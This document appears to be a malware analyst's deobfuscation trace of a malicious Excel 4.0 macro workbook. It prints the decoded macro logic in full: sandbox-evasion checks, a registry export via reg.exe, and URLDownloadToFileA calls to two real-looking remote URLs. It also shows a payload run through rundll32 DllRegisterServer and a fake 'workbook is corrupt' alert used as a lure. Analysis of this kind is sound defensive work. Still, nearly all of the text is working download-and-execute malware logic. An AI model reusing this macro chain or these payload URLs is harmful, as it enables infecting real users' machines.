dissectmalware

8a6

May 18th, 2020
  1. auto_open: auto_open->Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!$AG$4609
  2. [Starting Deobfuscation]
  3. CELL:AG4609 , FullEvaluation ,FORMULA.FILL("-19.4",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!J47428)
  4. CELL:AG4610 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!P1757)
  5. CELL:P1757 , FullEvaluation ,FORMULA.FILL("103.5",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HZ5126)
  6. CELL:P1758 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AW28226)
  7. CELL:AW28226 , FullEvaluation ,FORMULA.FILL("24",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HV27471)
  8. CELL:AW28227 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CX1185)
  9. CELL:CX1185 , FullEvaluation ,FORMULA.FILL("125",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GS53177)
  10. CELL:CX1186 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!IN52324)
  11. CELL:IN52324 , FullEvaluation ,FORMULA.FILL("-49.75",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EP63404)
  12. CELL:IN52325 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DU23026)
  13. CELL:DU23026 , FullEvaluation ,FORMULA.FILL("-432.25",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CS18382)
  14. CELL:DU23027 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HQ54667)
  15. CELL:HQ54667 , FullEvaluation ,FORMULA.FILL("-431",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AI56425)
  16. CELL:HQ54668 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BA29292)
  17. CELL:BA29292 , FullEvaluation ,FORMULA.FILL("208",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EP49854)
  18. CELL:BA29293 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!IN10715)
  19. CELL:IN10715 , FullEvaluation ,FORMULA.FILL("16.6",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DW30235)
  20. CELL:IN10716 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CC50114)
  21. CELL:CC50114 , FullEvaluation ,FORMULA.FILL("45",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AU21703)
  22. CELL:CC50115 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HV26230)
  23. CELL:HV26230 , FullEvaluation ,FORMULA.FILL("204",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!T44829)
  24. CELL:HV26231 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FK46285)
  25. CELL:FK46285 , FullEvaluation ,FORMULA.FILL("257",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DU1459)
  26. CELL:FK46286 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!IT54104)
  27. CELL:IT54104 , FullEvaluation ,FORMULA.FILL("147.75",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EN33239)
  28. CELL:IT54105 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FZ31102)
  29. CELL:FZ31102 , FullEvaluation ,FORMULA.FILL("300",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DY25916)
  30. CELL:FZ31103 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HK46610)
  31. CELL:HK46610 , FullEvaluation ,FORMULA.FILL("64",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EB18916)
  32. CELL:HK46611 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FU9381)
  33. CELL:FU9381 , FullEvaluation ,FORMULA.FILL("101",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AM52178)
  34. CELL:FU9382 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AL40024)
  35. CELL:AL40024 , FullEvaluation ,FORMULA.FILL("-180.75",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DJ50650)
  36. CELL:AL40025 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DR50223)
  37. CELL:DR50223 , FullEvaluation ,FORMULA.FILL("-80",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EZ41859)
  38. CELL:DR50224 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!A61465)
  39. CELL:A61465 , FullEvaluation ,FORMULA.FILL("-380",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BV5310)
  40. CELL:A61466 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BE23997)
  41. CELL:BE23997 , FullEvaluation ,FORMULA.FILL("-578",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AC31490)
  42. CELL:BE23998 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AK47754)
  43. CELL:AK47754 , FullEvaluation ,FORMULA.FILL("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EY35505)
  44. CELL:AK47755 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BN5637)
  45. CELL:BN5637 , FullEvaluation ,FORMULA.FILL("=""C:\Windows\system32\rundll32.exe""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BU5841)
  46. CELL:BN5638 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GL25607)
  47. CELL:GL25607 , FullEvaluation ,FORMULA.FILL("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BS2095)
  48. CELL:GL25608 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BW23350)
  49. CELL:BW23350 , FullEvaluation ,FORMULA.FILL("=APP.MAXIMIZE()",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BS838)
  50. CELL:BW23351 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HQ9091)
  51. CELL:HQ9091 , FullEvaluation ,FORMULA.FILL("=IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CB2526)
  52. CELL:HQ9092 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BC65215)
  53. CELL:BC65215 , FullEvaluation ,FORMULA.FILL("=IF(GET.WORKSPACE(14)<390,CLOSE(FALSE),)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CN32845)
  54. CELL:BC65216 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!N59953)
  55. CELL:N59953 , FullEvaluation ,FORMULA.FILL("=IF(GET.WORKSPACE(19),,CLOSE(TRUE))",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!U21055)
  56. CELL:N59954 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HK40654)
  57. CELL:HK40654 , FullEvaluation ,FORMULA.FILL("=IF(GET.WORKSPACE(42),,CLOSE(TRUE))",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EL41507)
  58. CELL:HK40655 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CF37393)
  59. CELL:CF37393 , FullEvaluation ,FORMULA.FILL("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,CLOSE(TRUE))",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EU17908)
  60. CELL:CF37394 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FW23082)
  61. CELL:FW23082 , FullEvaluation ,FORMULA.FILL("=""EXPORT HKCU\Software\Microsoft\Office\""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CE8598)
  62. CELL:FW23083 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DN34043)
  63. CELL:DN34043 , FullEvaluation ,FORMULA.FILL("=""C:\Users\Public\3ubDcx.reg""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DB23252)
  64. CELL:DN34044 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EZ34143)
  65. CELL:EZ34143 , FullEvaluation ,FORMULA.FILL("=R[-10969]C[-18]&GET.WORKSPACE(2)&""\Excel\Security ""&R[3685]C[5]&"" /y""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CW19567)
  66. CELL:EZ34144 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GZ20828)
  67. CELL:GZ20828 , FullEvaluation ,FORMULA.FILL("=""C:\Windows\system32\reg.exe""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HW60470)
  68. CELL:GZ20829 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CT59787)
  69. CELL:CT59787 , FullEvaluation ,FORMULA.FILL("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[39911]C[-22],R[-992]C[-152],0,5)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!IS20559)
  70. CELL:CT59788 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FH7265)
  71. CELL:FH7265 , FullEvaluation ,FORMULA.FILL("=WHILE(ISERROR(FILES(R[-26287]C[-72])))",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FV49539)
  72. CELL:FH7266 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HI35007)
  73. CELL:HI35007 , FullEvaluation ,FORMULA.FILL("=WAIT(NOW()+""00:00:01"")",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FV49540)
  74. CELL:HI35008 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HO35474)
  75. CELL:HO35474 , FullEvaluation ,FORMULA.FILL("=NEXT()",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FV49541)
  76. CELL:HO35475 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HU5719)
  77. CELL:HU5719 , FullEvaluation ,FORMULA.FILL("=""http://shetkarimarket.com/wp-snapshots/tmp/wp-smart.php""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AC65423)
  78. CELL:HU5720 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CH4760)
  79. CELL:CH4760 , FullEvaluation ,FORMULA.FILL("=""http://theislandmen.com/wp-smart.php""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!G56096)
  80. CELL:CH4761 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!IC41305)
  81. CELL:IC41305 , FullEvaluation ,FORMULA.FILL("=FOPEN(R[-31159]C[-9])",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DK54411)
  82. CELL:IC41306 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FR64405)
  83. CELL:FR64405 , FullEvaluation ,FORMULA.FILL("=FPOS(R[28056]C[-119],215)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HZ26355)
  84. CELL:FR64406 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FP48504)
  85. CELL:FP48504 , FullEvaluation ,FORMULA.FILL("=FREAD(R[-2685]C[-83],255)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GP57096)
  86. CELL:FP48505 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AD42538)
  87. CELL:AD42538 , FullEvaluation ,FORMULA.FILL("=FCLOSE(R[-3110]C[-84])",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GQ57521)
  88. CELL:AD42539 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EK15074)
  89. CELL:EK15074 , FullEvaluation ,FORMULA.FILL("=FILE.DELETE(R[-17443]C[75])",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AE40695)
  90. CELL:EK15075 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GB4920)
  91. CELL:GB4920 , FullEvaluation ,FORMULA.FILL("=IF(ISNUMBER(SEARCH(""0001"",R[-6135]C[4])),CLOSE(FALSE),)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GL63231)
  92. CELL:GB4921 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FG18856)
  93. CELL:FG18856 , FullEvaluation ,FORMULA.FILL("=""C:\Users\Public\iTuTkLL.html""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CE12504)
  94. CELL:FG18857 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BE33857)
  95. CELL:BE33857 , FullEvaluation ,FORMULA.FILL("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-55410]C[-86],R[-45001]C[-74],0,0)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FA57505)
  96. CELL:BE33858 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DU10606)
  97. CELL:DU10606 , FullEvaluation ,FORMULA.FILL("=FILES(R[-4582]C[34])",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AW17086)
  98. CELL:DU10607 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CO25990)
  99. CELL:CO25990 , FullEvaluation ,FORMULA.FILL("=IF(ISERROR(R[-31215]C[-181]),CLOSE(FALSE),)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HV48301)
  100. CELL:CO25991 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GD42294)
  101. CELL:GD42294 , FullEvaluation ,FORMULA.FILL("=""C:\Users\Public\ieWn8FXU.html""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!ER20373)
  102. CELL:GD42295 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GQ40890)
  103. CELL:GQ40890 , FullEvaluation ,FORMULA.FILL("=R[-38146]C[-91]&"",DllRegisterServer""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!IE58519)
  104. CELL:GQ40891 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EF57495)
  105. CELL:EF57495 , FullEvaluation ,FORMULA.FILL("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[25011]C[-20],R[-20039]C[99],0,0)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AW40412)
  106. CELL:EF57496 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DF12742)
  107. CELL:DF12742 , FullEvaluation ,FORMULA.FILL("=FILES(R[295]C[142])",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!F20078)
  108. CELL:DF12743 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DL31167)
  109. CELL:DL31167 , FullEvaluation ,FORMULA.FILL("=IF(ISERROR(R[-20753]C[-131]),,RUN(R[-3649]C[15]))",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EG40831)
  110. CELL:DL31168 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BT26772)
  111. CELL:BT26772 , FullEvaluation ,FORMULA.FILL("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[31449]C[-135],R[-4274]C[6],0,0)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EL24647)
  112. CELL:BT26773 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CI19987)
  113. CELL:CI19987 , FullEvaluation ,FORMULA.FILL("=ALERT(R[-1677]C[3],2)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EV37182)
  114. CELL:CI19988 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CX37204)
  115. CELL:CX37204 , FullEvaluation ,FORMULA.FILL("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-33829]C[-18],R[18849]C[148],0,5)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CM39670)
  116. CELL:CX37205 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GO64254)
  117. CELL:GO64254 , FullEvaluation ,FORMULA.FILL("=CLOSE(FALSE)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FJ6373)
  118. CELL:GO64255 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EY35505)
  119. CELL:EY35505 , FullEvaluation ,"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  120. CELL:EY35506 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BU5841)
  121. CELL:BU5841 , FullEvaluation ,"C:\Windows\system32\rundll32.exe"
  122. CELL:BU5842 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BS2095)
  123. CELL:BS2095 , FullEvaluation ,"https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates"
  124. CELL:BS2096 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BS838)
  125. CELL:BS838 , NotImplemented ,APP.MAXIMIZE()
  126. CELL:BS839 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CB2526)
  127. CELL:CB2526 , FullBranching ,IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)
  128. CELL:CB2526 , End ,[TRUE] CLOSE(FALSE)
  129. CELL:CB2526 , FullEvaluation ,[FALSE]
  130. CELL:CB2527 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CN32845)
  131. CELL:CN32845 , FullBranching , IF(GET.WORKSPACE(14)<390,CLOSE(FALSE),)
  132. CELL:CN32845 , End , [TRUE] CLOSE(FALSE)
  133. CELL:CN32845 , FullEvaluation , [FALSE]
  134. CELL:CN32846 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!U21055)
  135. CELL:U21055 , FullEvaluation , IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  136. CELL:U21056 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EL41507)
  137. CELL:EL41507 , FullEvaluation , IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  138. CELL:EL41508 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EU17908)
  139. CELL:EU17908 , FullEvaluation , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,CLOSE(TRUE))
  140. CELL:EU17909 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CE8598)
  141. CELL:CE8598 , FullEvaluation , "EXPORT HKCU\Software\Microsoft\Office\"
  142. CELL:CE8599 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DB23252)
  143. CELL:DB23252 , FullEvaluation , "C:\Users\Public\3ubDcx.reg"
  144. CELL:DB23253 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CW19567)
  145. CELL:CW19567 , FullEvaluation , EXPORT HKCU\Software\Microsoft\Office\"GET.WORKSPACE(2)\Excel\Security "C:\Users\Public\3ubDcx.reg /y
  146. CELL:CW19568 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HW60470)
  147. CELL:HW60470 , FullEvaluation , "C:\Windows\system32\reg.exe"
  148. CELL:HW60471 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!IS20559)
  149. CELL:IS20559 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\reg.exe""","EXPORT HKCU\Software\Microsoft\Office\""GET.WORKSPACE(2)\Excel\Security ""C:\Users\Public\3ubDcx.reg /y",0,5)
  150. CELL:IS20560 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FV49539)
  151. CELL:FV49539 , PartialEvaluation , WHILE("""C:\Users\Public\3ubDcx.reg""")
  152. CELL:FV49540 , PartialEvaluation , WAIT(NOW()+"00:00:01")
  153. CELL:FV49541 , PartialEvaluation , NEXT()
  154. CELL:FV49542 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AC65423)
  155. CELL:AC65423 , FullEvaluation , "http://shetkarimarket.com/wp-snapshots/tmp/wp-smart.php"
  156. CELL:AC65424 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!G56096)
  157. CELL:G56096 , FullEvaluation , "http://theislandmen.com/wp-smart.php"
  158. CELL:G56097 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DK54411)
  159. CELL:DK54411 , PartialEvaluation , FOPEN("""C:\Users\Public\3ubDcx.reg""")
  160. CELL:DK54412 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HZ26355)
  161. CELL:HZ26355 , PartialEvaluation , FPOS("""""""C:\Users\Public\3ubDcx.reg""""""",215)
  162. CELL:HZ26356 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GP57096)
  163. CELL:GP57096 , PartialEvaluation , FREAD("""""""C:\Users\Public\3ubDcx.reg""""""",255)
  164. CELL:GP57097 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GQ57521)
  165. CELL:GQ57521 , PartialEvaluation , FCLOSE("""""""C:\Users\Public\3ubDcx.reg""""""")
  166. CELL:GQ57522 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AE40695)
  167. CELL:AE40695 , NotImplemented , FILE.DELETE(R[-17443]C[75])
  168. CELL:AE40696 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GL63231)
  169. CELL:GL63231 , FullEvaluation , IF(ISNUMBER(SEARCH("0001",R[-6135]C[4])),CLOSE(FALSE),)
  170. CELL:GL63232 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CE12504)
  171. CELL:CE12504 , FullEvaluation , "C:\Users\Public\iTuTkLL.html"
  172. CELL:CE12505 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FA57505)
  173. CELL:FA57505 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""","""C:\Users\Public\iTuTkLL.html""",0,0)
  174. CELL:FA57506 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AW17086)
  175. CELL:AW17086 , PartialEvaluation , FILES("""C:\Users\Public\iTuTkLL.html""")
  176. CELL:AW17087 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HV48301)
  177. CELL:HV48301 , FullBranching , IF(ISERROR(R[-31215]C[-181]),CLOSE(FALSE),)
  178. CELL:HV48301 , End , [TRUE] CLOSE(FALSE)
  179. CELL:HV48301 , FullEvaluation , [FALSE]
  180. CELL:HV48302 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!ER20373)
  181. CELL:ER20373 , FullEvaluation , "C:\Users\Public\ieWn8FXU.html"
  182. CELL:ER20374 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!IE58519)
  183. CELL:IE58519 , FullEvaluation , "C:\Users\Public\ieWn8FXU.html",DllRegisterServer
  184. CELL:IE58520 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AW40412)
  185. CELL:AW40412 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"""http://shetkarimarket.com/wp-snapshots/tmp/wp-smart.php""","""C:\Users\Public\ieWn8FXU.html""",0,0)
  186. CELL:AW40413 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!F20078)
  187. CELL:F20078 , PartialEvaluation , FILES("""C:\Users\Public\ieWn8FXU.html""")
  188. CELL:F20079 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EG40831)
  189. CELL:EG40831 , FullBranching , IF(ISERROR(R[-20753]C[-131]),,RUN(R[-3649]C[15]))
  190. CELL:EG40831 , FullEvaluation , [TRUE]
  191. CELL:EG40832 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EL24647)
  192. CELL:EL24647 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"""http://theislandmen.com/wp-smart.php""","""C:\Users\Public\ieWn8FXU.html""",0,0)
  193. CELL:EL24648 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EV37182)
  194. CELL:EV37182 , PartialEvaluation , ALERT("""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",2)
  195. CELL:EV37183 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CM39670)
  196. CELL:CM39670 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\rundll32.exe""","""C:\Users\Public\ieWn8FXU.html"",DllRegisterServer",0,5)
  197. CELL:CM39671 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FJ6373)
  198. CELL:FJ6373 , End , CLOSE(FALSE)
  199. CELL:EG40831 , FullEvaluation , [FALSE] RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EV37182)
  200. CELL:EV37182 , PartialEvaluation , ALERT("""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",2)
  201. CELL:EV37183 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CM39670)
  202. CELL:CM39670 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\rundll32.exe""","""C:\Users\Public\ieWn8FXU.html"",DllRegisterServer",0,5)
  203. CELL:CM39671 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FJ6373)
  204. CELL:FJ6373 , End , CLOSE(FALSE)
  205. time elapsed: 6.086402177810669